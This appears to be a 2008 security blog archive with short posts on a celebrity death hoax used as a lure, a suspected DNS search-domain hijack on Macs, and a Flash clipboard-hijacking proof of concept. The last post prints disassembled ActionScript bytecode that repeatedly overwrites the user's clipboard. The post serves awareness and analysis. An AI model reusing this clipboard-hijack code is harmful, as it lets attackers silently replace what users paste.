Archive for September 21, 2008

Top Posts from WordPress

Notice, “Oprah Winfrey’s Death”…

It’s been all over the internet, but definitely coming from unreliable source. It’s just a sick hoax!

For sure people started searching and verifying this information online but be careful from dodgy websites! You might bump to a drive by download servers.

“” Is it a new DNSChanger?

As mentioned in my previous post, there has been a report about browser hijacking. However, as days goes by more and more Mac OS X users shares the same experience.

Unfortunately, this site serves unwanted pop-ups (Ads) although no malwares yet found.

So what’s happening here ?

1st of June, MozillaZine Forum user reported this incident and found his DNS search domain was set to “”. From the thread, they suspected that it was coming from the ISP (Rogers Cable).

A month after, another MozillaZine Forum user feels that the issue covers 3 possible source: 1) Zlob DNSChanger 2) DNS hijacking caused by SMC wireless routers 3) Rogers “service” hijacking URL searches

As more and more user experiencing this issue, I wonder if this is indeed related to Zlob’s DNSChanger. Unless someone can provide a DMG or URL for analysis, we can’t conclude this incident as new DNSChanger related activity.

Clipboard Hijacking SWF PoC

Thank God, I’m back …

So, the SWF PoC (proof-of-concept) Clipboard hijacking works in cross-platform (Windows and Mac browser). The sneaky behavior does not exploit any vulnerability instead it uses a legitimate ActionScript as mentioned in my previous post.  Basically, if you refer SWF File Format Specification 9 – SWF 9 introduced ActionScript 3.0 with new DoABC (Do ActionScript Byte Code)  action-definition tags. Like DoAction tags, DoABC defines a series of bytecode to be executed. However, this time DoABC tag run in ActionScript 3.0 virtual machines [For further reading -> VM2 Overview].

From the PoC that was published…

// Defining the symbolclass "test_fla.MainTimeline" into the package
[052]       515 DOABC
class [package]test_fla:MainTimeline extends [package]flash.display:MovieClip, test_fla:MainTimeline, flags=08

{ // test_fla:frame1

constructor ---- [package]test_fla:MainTimeline()
[3 1 10 11 0]
constructsuper 0 params
findpropstrict [package]:addFrameScript
pushbyte 00
getlex [packageinternal]test_fla:frame1
callpropvoid [package]:addFrameScript, 2 params
//test_fla:frame1() executes setClip()

method ---- [packageinternal]test_fla:frame1()
[3 1 10 11 0]
findpropstrict [package]flash.utils:setInterval
getlex [package]:setClip
pushbyte 01
callpropvoid [package]flash.utils:setInterval, 2 params

// setClip() push "" users' clipboard
method ---- [package]:setClip()
[2 1 10 11 0]
getlex [package]flash.system:System
pushstring ""
callpropvoid [package]:setClipboard, 1 params
} }

The interesting part here is not the code, instead the legitimate features and capability that allows it to  cross over boundaries and user systems’ security perimeter making it intrusive, sneaky and potential vector for attackers and malwares.

Should developers must make sure that their processes have their own execution domain?

So, whose fault is this ?